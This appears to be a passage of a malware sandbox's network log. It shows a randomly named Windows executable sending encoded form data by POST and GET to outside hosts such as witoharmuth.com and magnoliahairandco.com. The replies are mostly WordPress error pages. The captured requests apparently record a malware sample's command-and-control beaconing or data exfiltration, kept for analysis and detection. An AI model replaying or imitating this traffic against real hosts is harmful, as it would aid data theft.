Jun 13, 2024 11:03:59.380634069 CEST	1236	IN	Data Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d Data Ascii: background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49714	85.13.162.190	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:04:00.934247017 CEST	1755	OUT	POST /jd4u/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.witoharmuth.com Content-Length: 1239 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.witoharmuth.com Referer: http://www.witoharmuth.com/jd4u/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 69 62 55 76 61 56 39 4f 66 68 52 48 75 64 35 46 2f 4b 31 69 54 4b 6f 67 6a 45 6b 39 49 64 52 51 6e 45 6e 41 59 4d 34 41 6c 45 75 2f 6f 45 32 72 54 74 43 4c 59 52 75 32 55 73 46 79 62 6b 38 48 30 49 42 39 6c 6c 55 47 39 63 68 36 37 34 32 70 77 44 64 72 6e 45 71 56 32 72 6e 6e 33 4b 72 4d 37 32 68 35 6a 69 7a 6e 37 65 39 4b 59 6e 72 52 47 4c 4d 35 2b 33 34 77 34 63 54 58 48 56 59 6b 42 39 69 4d 4a 55 66 51 70 4b 37 59 72 76 76 35 46 34 4e 44 47 56 54 6b 36 44 6c 64 39 77 31 4e 4d 48 68 46 4b 41 79 46 6e 41 63 33 50 51 6a 55 50 77 31 45 49 34 48 68 50 52 46 43 51 6a 6a 67 53 6c 2b 33 64 43 48 63 6d 42 52 79 4c 6e 76 74 58 57 33 65 4f 51 61 30 62 74 36 78 42 54 50 6b 31 70 77 4d 4f 30 70 49 58 51 4d 49 53 74 58 64 65 6e 37 55 67 6a 4a 51 4d 2f 68 34 77 38 49 78 6f 4f 67 4d 4f 39 64 4b 2b 61 35 7a 68 44 45 70 4c 54 4b 76 67 69 6b 57 45 48 56 46 65 52 38 68 42 6a 2f 71 61 48 67 48 75 36 4a 4d 39 64 49 5a 57 68 68 75 54 42 43 72 46 39 2b 4e 77 76 54 45 51 32 58 34 50 65 52 54 74 31 45 33 75 79 53 [TRUNCATED] Data Ascii: fD=ibUvaV9OfhRHud5F/K1iTKogjEk9IdRQnEnAYM4AlEu/oE2rTtCLYRu2UsFybk8H0IB9llUG9ch6742pwDdrnEqV2rnn3KrM72h5jizn7e9KYnrRGLM5+34w4cTXHVYkB9iMJUfQpK7Yrvv5F4NDGVTk6Dld9w1NMHhFKAyFnAc3PQjUPw1EI4HhPRFCQjjgSl+3dCHcmBRyLnvtXW3eOQa0bt6xBTPk1pwMO0pIXQMIStXden7UgjJQM/h4w8IxoOgMO9dK+a5zhDEpLTKvgikWEHVFeR8hBj/qaHgHu6JM9dIZWhhuTBCrF9+NwvTEQ2X4PeRTt1E3uySNiCnZiChBx6YzFq519dY+ov9vgwRGi7cZnl7MKB2vZZ889wFd92nz/jPGCWxEjMKs+dPX1Gen2+7UpcOM596+OtpbR63Lcpb5hdrXdF76Qkwfxj7cM5MUi/mxSN31HINkwp8mZg7Lgs/jrAmVDj6NJpThGJCQDeszyNZtHfGHNdTPqpWorzt6N97uepOvcm41WqtUd2hD//UYD6C/C1rtRFB8HTTQhe3UZHlDQ8Q0ZmJjrZSQyI9xML2wxDZkAx64148AWLBXA4IUUtmRO2x2EJfLs47dRjjrBlZbjDJHWmF82bhFqIM0eRmJknTQonElY1SJV2LN/MHNWMr8EEDyVpptcS+55tEA3LnFEtMoENEEwlcuRrFbLqr+VCelqiYE6jPTzDxpEAFGk5mgEXWDB0QjNkGDBveVcwn+O1n6v+Rt+bJXvVz5gq9SJHNnOSrAVcDOBLUliX/aLSDfXQVTWliyBv92iuNa66GGRFhdxV+kLnsIGrxMTeyL+2qwN9sOo4TC61Z3cWoBz2Xlnsh21JXuJ5VgrKXiGI2MwpVX4soPfVz523Vlzz9QeAm3yHIwuGse1Hom+OTKNCkSVMIHby4NJLa2aKhqQbHKXQd10ZMMzJMQOOM9nIR/BZmQjl4hAWPcLuiKiYMfZf4kKcWFQsFiLJbt4A5VT [TRUNCATED]
Jun 13, 2024 11:04:01.862759113 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 13 Jun 2024 09:04:01 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: User-Agent Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 [TRUNCATED] Data Ascii: 2000<!DOCTYPE html><html lang="de-DE"><head><meta charset='UTF-8'><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Seite nicht gefunden – witoharmuth.de</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//www.witoharmuth.de' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de » Feed" href="https://www.witoharmuth.de/feed/" /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de » Kommentar-Feed" href="https://www.witoharmuth.de/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","sv
Jun 13, 2024 11:04:01.862831116 CEST	1236	IN	Data Raw: 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 Data Ascii: gUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.witoharmuth.de\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.4"}};/! This file is auto-generated /!function(i,n){var o,
Jun 13, 2024 11:04:01.862868071 CEST	1236	IN	Data Raw: 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 Data Ascii: n f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});r
Jun 13, 2024 11:04:01.862901926 CEST	1236	IN	Data Raw: 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 Data Ascii: ){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingE
Jun 13, 2024 11:04:01.862937927 CEST	848	IN	Data Raw: 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f Data Ascii: css' type='text/css'>/! This file is auto-generated /.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-
Jun 13, 2024 11:04:01.862970114 CEST	1236	IN	Data Raw: 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f Data Ascii: d-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--color--accent: #e91e63;--wp--preset--color--background-color: #1e73be;--wp--preset--color--header-gradient: #a81d84;--wp--preset--gradient--vivid-cyan-blue-to-vivid-
Jun 13, 2024 11:04:01.863006115 CEST	1236	IN	Data Raw: 25 2c 72 67 62 28 31 30 37 2c 30 2c 36 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 Data Ascii: %,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50
Jun 13, 2024 11:04:01.863038063 CEST	1236	IN	Data Raw: 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 7b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 7d 62 6f 64 79 20 2e 69 73 2d Data Ascii: }:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex > {margin: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > {margin: 0;}:whe
Jun 13, 2024 11:04:01.863070965 CEST	1236	IN	Data Raw: 79 61 6e 2d 62 6c 75 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 Data Ascii: yan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important
Jun 13, 2024 11:04:01.863106012 CEST	1236	IN	Data Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d Data Ascii: background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp-
Jun 13, 2024 11:04:01.868380070 CEST	1236	IN	Data Raw: 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 Data Ascii: r--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cya

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49715	85.13.162.190	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:04:03.460664034 CEST	454	OUT	GET /jd4u/?fD=vZ8PZlFPVnVyyN885vZALLUChV9dHrd3y3rRI9QumGWurBO6VP20aAnkH/ZZbF4T7IQeomZ4+ZpTiLO44xxEwk6LrLidp4nJrApztAjEtY9oMR30BoZ74UoGsezUDnZKUQ==&j0=vTcl_2X8QJ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.witoharmuth.com Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jun 13, 2024 11:04:04.442004919 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 13 Jun 2024 09:04:04 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: User-Agent Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 [TRUNCATED] Data Ascii: 2000<!DOCTYPE html><html lang="de-DE"><head><meta charset='UTF-8'><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Seite nicht gefunden – witoharmuth.de</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//www.witoharmuth.de' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de » Feed" href="https://www.witoharmuth.de/feed/" /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de » Kommentar-Feed" href="https://www.witoharmuth.de/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","sv
Jun 13, 2024 11:04:04.442070961 CEST	1236	IN	Data Raw: 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 Data Ascii: gUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.witoharmuth.de\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.4"}};/! This file is auto-generated /!function(i,n){var o,
Jun 13, 2024 11:04:04.442107916 CEST	1236	IN	Data Raw: 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 Data Ascii: n f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});r
Jun 13, 2024 11:04:04.442142963 CEST	636	IN	Data Raw: 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 Data Ascii: ){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingE
Jun 13, 2024 11:04:04.442177057 CEST	1236	IN	Data Raw: 74 74 69 6e 67 73 29 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 Data Ascii: ttings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !i
Jun 13, 2024 11:04:04.442207098 CEST	212	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 Data Ascii: p--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivi
Jun 13, 2024 11:04:04.442240953 CEST	1236	IN	Data Raw: 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f Data Ascii: d-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--color--accent: #e91e63;--wp--preset--color--background-color: #1e73be;--wp--preset--color--header-gradient: #a81d84;--wp--preset--gradient--vivid-cyan-blue-to-vivid-
Jun 13, 2024 11:04:04.442276001 CEST	1236	IN	Data Raw: 25 2c 72 67 62 28 31 30 37 2c 30 2c 36 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 Data Ascii: %,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50
Jun 13, 2024 11:04:04.442310095 CEST	1236	IN	Data Raw: 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 7b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 7d 62 6f 64 79 20 2e 69 73 2d Data Ascii: }:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex > {margin: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > {margin: 0;}:whe
Jun 13, 2024 11:04:04.442346096 CEST	636	IN	Data Raw: 79 61 6e 2d 62 6c 75 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 Data Ascii: yan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important
Jun 13, 2024 11:04:04.447259903 CEST	1236	IN	Data Raw: 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 Data Ascii: has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-ambe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49716	34.149.87.45	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:04:09.788253069 CEST	736	OUT	POST /fkxp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.magnoliahairandco.com Content-Length: 203 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.magnoliahairandco.com Referer: http://www.magnoliahairandco.com/fkxp/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 79 2b 49 2b 7a 61 72 62 31 58 4c 45 75 59 63 59 70 39 31 76 47 6b 67 63 79 35 52 51 76 4f 61 79 33 49 52 62 7a 4b 77 4d 75 52 78 63 65 66 77 72 31 55 59 33 55 45 36 49 6a 4e 6b 79 51 45 43 33 6f 34 42 54 54 63 58 45 68 71 63 76 5a 6e 73 76 6c 70 6e 62 74 2f 7a 6e 69 37 53 63 62 46 5a 79 59 6b 46 59 72 6a 6a 6f 65 6d 62 65 6e 37 7a 69 4e 75 6f 56 36 55 34 65 33 49 47 4d 72 45 32 79 38 53 58 6c 39 64 6b 4f 4c 35 77 59 65 4f 4e 7a 69 54 47 52 6c 56 6d 41 30 65 4a 75 54 4c 74 69 2f 4b 69 45 4e 70 2f 34 34 69 6e 6d 56 77 61 73 4d 37 52 6f 72 75 6a 42 7a 56 4f 6b 2b 6c 48 73 64 43 54 72 36 2b 73 3d Data Ascii: fD=y+I+zarb1XLEuYcYp91vGkgcy5RQvOay3IRbzKwMuRxcefwr1UY3UE6IjNkyQEC3o4BTTcXEhqcvZnsvlpnbt/zni7ScbFZyYkFYrjjoemben7ziNuoV6U4e3IGMrE2y8SXl9dkOL5wYeONziTGRlVmA0eJuTLti/KiENp/44inmVwasM7RorujBzVOk+lHsdCTr6+s=
Jun 13, 2024 11:04:10.435235977 CEST	676	IN	HTTP/1.1 403 Forbidden Content-Length: 146 Content-Type: text/html Server: Pepyaka X-Wix-Request-Id: 1718269450.3456167223852310460 X-Content-Type-Options: nosniff Accept-Ranges: bytes Date: Thu, 13 Jun 2024 09:04:10 GMT X-Served-By: cache-dfw-kdfw8210108-DFW X-Cache: MISS X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLsrnLBntwLRXccxrbxQ/m1sa0sM5c8dDUFHeNaFq0qDu Via: 1.1 google glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc= Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 